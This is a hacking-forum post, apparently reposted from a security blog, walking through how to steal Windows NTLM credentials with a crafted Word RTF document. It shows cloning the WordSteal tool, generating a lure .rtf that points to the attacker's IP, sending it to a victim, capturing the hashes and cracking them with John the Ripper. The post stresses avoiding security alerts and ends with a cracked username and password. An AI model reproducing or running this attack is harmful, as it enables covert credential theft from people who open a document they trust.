• We just launched and are currently in beta. Join us as we build and grow the community.

Stealing Windows Credentials of Remote PC with MS Office Document

fahdix

White Hat
F Rep
0
0
0
Rep
0
F Vouches
0
0
0
Vouches
0
Posts
171
Likes
125
Bits
2 MONTHS
2 2 MONTHS OF SERVICE
LEVEL 1 400 XP
Today you will found something incredible in this article which is related to a newly lunched script named as “WORD STEAL” that can define your hacking skill more and more. This script will create a POC that will steal NTLM hashes from a remote computer.

Microsoft Word has the ability to include images from remote locations. This is an undocumented feature but was found used by malware creators to include images through http for statistics. We can also include remote files to an SMB server and the victim will authenticate with his logins credentials. This is very useful during a Pentest because allows you to steal credentials without triggering any alerts and most of the security apps do not detect this.

Let’s Breach

Attacker: Kali Linux

Target: Windows 10 (Microsoft Word 2007)

First, we need to download it from Github, open the terminal in your Kali Linux and type following command.

Code:
git clone https://github.com/0x090x0/WordSteal.git

1.png


Now open the downloaded folder word steal where you will get a python script “main.py” give all permissions to the main.py script if required.

Code:
chmod 777 main.py

As the author has described that this script will convert an image or say .jpg into .rtf (Microsoft word file) The Rich Text Format is a proprietary document file format with published specification developed by Microsoft Corporation for cross-platform document interchange with Microsoft products.

After then download an image and save it inside Wordsteal folder, since I have an image “1.jpg” at this moment we require to type the following command which generates .rtf file that steals NTLM hashes from a remote computer.

Code:
python main.py 192.168.0.104 1.jpeg 1

2.png


Above command will generate the .rtf file as you can figure out this in the given screenshot after then send the 1.rtf file to remote PC.

3.png


When victim will open 1.rtf (as Microsoft word file) in his system, on another hand attack will receive NTLM hashes.

4.png


Inside word steal, we have stolen credentials without triggering any alerts which you can observe in the following image.

5.png


Now use password cracker tool john the ripper to crack hashes in password_netntlmv2 file or type following command

Code:
John password_netntlmv2

Cool!!! We can see the victim’s credential clearly RAJ: 123 that might be further use for login.

6.png


Author: Aarti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here
 

422,212

310,551

310,560

Top